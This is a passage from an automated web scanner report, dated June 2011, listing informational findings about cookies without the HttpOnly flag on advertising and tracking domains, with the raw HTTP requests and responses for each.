GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707?[AQB]&ndh=1&t=24/5/2011%208%3A44%3A5%205%20300&ce=UTF-8&pageName=Support%20Home&g=http%3A//support.ea.com/&cc=USD&c1=Not%20Logged%20In&v1=Not%20Logged%20In&c15=EA%20Support&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B795-6000018160001985|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:44:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:44:06 GMT
Last-Modified: Sat, 25 Jun 2011 13:44:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E0494A6-6F1B-46C49248"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www411
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
13.48. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=4761888b-4251-4912-8743-09bf2fc2ed75 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1308573230578&e90=1308838755219&e50=1308573231659&e100=1308838755889

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; domain=.interclick.com; expires=Fri, 25-Jun-2021 02:14:00 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 25 Jun 2011 02:13:59 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
13.49. http://images.apple.com/global/nav/styles/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=354
Expires: Fri, 24 Jun 2011 13:33:51 GMT
Date: Fri, 24 Jun 2011 13:27:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=DM6tKPNIkmYZsEVSBSdYOGJ7OTa7PjwA2735gwg+B3srHhFj8YVJDLNI3Wi2SUB1dCqrK7+XltzB/RcTVZmzUffySHH1UmBafoYJMj8YHYwt2pGgPse/fGM3FRGKsYngf6a77lbqVf66I18XlDNjfSTbjjIE0caGcGeQC4Ga/6t7SQdMOjY9JN8DEVW1UMoc6rrdnREZK82vJpIYTfG0q24uni8l6skyzHr5oYaAtC+cEVmOYnxcZEVM/0zwt8pWHHT7wAgPsXOSwDVj2beSsp5/JZ2hxDkV+qJm/gvvlB5s4gKqlC/OkT9MmT5nrCzrHJRdC+dWafIqs+ExZSu4RsRpt+yRsvm+2Ebw4C2MVPVg6mUwoEFIRaz9PCY0pRAq3LXUGVhUO8khrTSYOT60ngG/28nSEmej8riAE3H3pM3Ek1xzfTDSN4w9rduEpmRVOFjfLPb+A3mPF99al/pIw2PdnTJ0NQXeRkmztMT8xZeLjBS/B0mP+3zsHAYthpfDX9LIuH2xTPXrpJX2DeMFKurDBc9hP5LjsnlklHcD2q0g+oy0qYkWk5CBKjp+akzk; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.50. http://images.apple.com/ipod/images/gradient_texture20100901.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /ipod/images/gradient_texture20100901.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipod/images/gradient_texture20100901.jpg HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]
Range: bytes=2714-2714
If-None-Match: "a9a-48f2afe054800"

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 01 Sep 2010 04:18:40 GMT
ETag: "a9a-48f2afe054800"
Server: Apache/2.2.14 (Unix)
X-N: S
Content-Length: 2714
Content-Type: image/jpeg
Cache-Control: max-age=492
Expires: Fri, 24 Jun 2011 13:36:09 GMT
Date: Fri, 24 Jun 2011 13:27:57 GMT
Connection: close
Set-Cookie: ccl=aJq+T0MKyuiZKEYbLPS03BsnrndkJJe79OF9a4ljFx2tXfiewibK/oLDQsuQHmvLldfmwr3Fy4L0VzGE/FZAmwGvg5eyINeUs6H9+NrRWh7L5rDRBVyuVYqUQ1MwgXZBWE62uEPzY/1srrhHHhDAA10Ed8INN9tddP9eMAan54eOY4CWr5NEeR7RrB9iQTG6DtqTjlAmG+4nNyVZ7jdIh9TtfBW5ttsnApQ+ss6WBwgVTe5XpPrqo6vXs2WkEODHPu2ZTusaew7hlMVTuZRtMsPrG6LtM+2d8bscqWCj9F3eRoX0D8U/rG61IMxp3iNbUfq17yxUGCepcoJpg7GPEIhyCmfIbzlT60df9tGrUeptBxvQJpz6OE9lkpl+jYRzKh1DGjK7WAFpJ5xH1Kah4ZCmugxzD3GHW8pK1NjHPUjSHa3Smmrzk7TAkG42vB8Pcmr55JDy/baPOrMw+rWTRiwgHGZT5gn0erArWxdwwcWIFgXTn4E5/SnP7yr92JudF1hKiiLCcbaD+7DP9RQAV5cMn+xkVVCm1M4Z3+tinPFItTpDIztx2jS0mCWnhZOf; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

......JFIF.....d.d......Ducky.......F......Adobe.d......................................
.                .

.....
...........................

.............................................................{.$..
...[SNIP]...
13.51. http://media.fastclick.net/w/get.media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/get.media

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/get.media?sid=56553&m=6&tp=8&d=j&t=n HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lyc=BwAAAAR47gNOACAAAXBfIASgAAdBUwAAwPX1TUAOAbRHQAWAAABKIAYBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcBoUXgAQsBvUTgAQsDeVcAAA==; pjw=BAEAAAACIAMDlZAETiAGAQABIAMCkbAEYAcCRcEIIA1AEwEAAA==; adv_ic=BxEAAACVkAROIAYGAAFJAACGYSAHIAtAAAM/zNdNQAdAFwH0WSAHQAwgAAAC4AIXAM3gAhcBw8vgAS8BaVrgAS8AseACFwHIYOABFwCg4AIXAbRWIFcgW0AAADjgAhcB61zgARcAMeACFwH7X+ABRwAk4AIXANjgAl8AA+ACFwA24AIvAdzK4AGnANPgAr8A2eACFwA+4AK/ANPgAhcAjCEpwKcA0OACFwFHU+ABjwDM4AIXAaJS4AEXAMngAhcA4+ACjwFsseABjwTNTwAACkEEAgAAAA==; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:01 GMT
Content-Type: application/x-javascript
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 297
Set-Cookie: pjw=BAIAAAACIAMDj5EETiAGAQABIAMCkbAEYBMCRcEIIA2AEwCV4AIfAYStgB8BcbqAHwMGAAAA; domain=.fastclick.net; path=/; expires=Sun, 26-Jun-2011 13:31:01 GMT
Set-Cookie: adv_ic=BxIAAACVkQROIAYJAAFJAABAYQAAAiALQAAAj+ACFwCG4AIXAz/M101AH0AvAfRZIAdADCAAAALgAhcAzeACFwHDy+ABLwFpWuABLwCx4AIXAchg4AEXAKDgAhcBtFYgVyBbQAAAOOACFwHrXOABFwAx4AIXAftf4AFHACTgAhcA2OACXwAD4AIXADbgAi8B3MrgAacA0+ACvwDZ4AIXAD7gAr8A0+ACFwCMIUHApwDQ4AIXAUdT4AGPAMzgAhcBolLgARcAyeACFwDj4AKPAWyx4AGPBM1PAAAKQQQCAAAA; domain=.fastclick.net; path=/; expires=Sat, 23-Jun-2012 13:31:01 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:31:01 GMT

{var dz=document;
dz.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid
...[SNIP]...
13.52. http://media.fastclick.net/w/tre  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=17597;evt=17799;cat1=22392;cat2=22393;rand=[CACHEBUSTER] HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=315899333
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adv_ic=BwYAAAC3stdNIAYGAAFJAADrXCAHIAtAAAGiseABFwGMTuABFwCR4AIXAeNf4AEXAGzgAhcEzU8AAApARCAAAF/gAhcBtFbgAS8AKeACFwF4XcAXAQAA; lyc=BwAAAATA9fVNACAAAbRHIASgAABKIAcBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcHoUUAAKrsA05AEQFwX0AFgAABQVOAB0AA4AUXAQAA; pluto=173274949960|v1

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:39 GMT
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=CAAAAAR47gNOACAAAXBfIASgAAdBUwAAwPX1TUAOAbRHQAWAAABKIAYBFPPgCRdAAAAPoBfgAwBALwIKuvBgRwFQW+ABGQalTAAA7+znYBcBaFbgARcGoUUAAI2QBGCPAb1E4AEXAXlX4AEL4AUXAQAA; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:30:39 GMT
Set-Cookie: pluto=173274949960|v1; domain=.fastclick.net; path=/; expires=Sun, 23-Jun-2013 13:30:39 GMT

GIF89a.............!.......,...........D..;
13.53. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3 HTTP/1.1
Host: network.realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
Cookie: OAX=rcHW804Ekc4ABIzz; NXCLICK2=011Qa6UK; NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Fri, 24 Jun 2011 13:32:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: NXCLICK2=011Qa6Uv; expires=Mon, 24-Jun-13 13:32:37 GMT; path=/; domain=.realmedia.com
Location: http://imagen01.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
Content-Length: 345
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 13:33:37 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://imagen01.247realmedia.com/RealMedia/ads/
...[SNIP]...
13.54. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=647111455;fpan=0;fpa=P0-1728005155-1308921999956;ns=0;url=http%3A%2F%2Fwww.redorbit.com%2Fnews%2Fbusiness%2F1993118%2Fspil_games_selects_adyens_internet_payment_system_for_global_social%2F;ref=;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1308922015580;tzo=300;a=p-c0n-0mxg7_y5A HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EEIBswEBiAeB0g4eqT0eThwirRfeKVpIfjDbQKs_YIYACUCkAOZ80iYTCOFdHhDRDhDRy0lDAOEQkdEOVPMNG7MKXhQDBQSEXzPRThAP0w6fKkENpPXaOHENkpGdKRA

Response

HTTP/1.1 302 Found
Connection: close
Location: http://bh.contextweb.com/bh/set.aspx?action=add&advid=357&token=EHEX1
Set-Cookie: d=EOYBrwEBiAeB0g4eqT0eThwijElqSH4w20CrP2CGAAlApADmfNImEwjhXR4Q0Q4Q0ctJQwDhEJHRDlTzDRuzCl4UAwUEhF8z0U4QD9MOnypBDaT12jhxDZKRnSkQ; expires=Thu, 22-Sep-2011 13:26:54 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Fri, 24 Jun 2011 13:26:54 GMT
Server: QS

13.55. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=E3F32BD05A8DDF4D5646D79640088B&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; put_1185=4325897289836481830; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; csi15=3140642.js^2^1308614600^1308614602; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; rpb=7259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%263672%3D1%264894%3D1; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%263672%3D12881%2C0%2C1%2C7%2C%264894%3D12881%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%263672%3D1%264894%3D1%266286%3D1; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%265421%3D11993%2C682%2C3%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%263672%3D12881%2C0%2C1%2C7%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C0%2C2%2C%2C; expires=Sun, 24-Jul-2011 17:04:28 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=E3F32BD05A8DDF4D5646D79640088B; expires=Sat, 23-Jun-2012 17:04:28 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
13.56. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=2be5fb6c-c0d8-147f-d80c-480b0a7b0393&rtb=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1308190406; i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:27 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
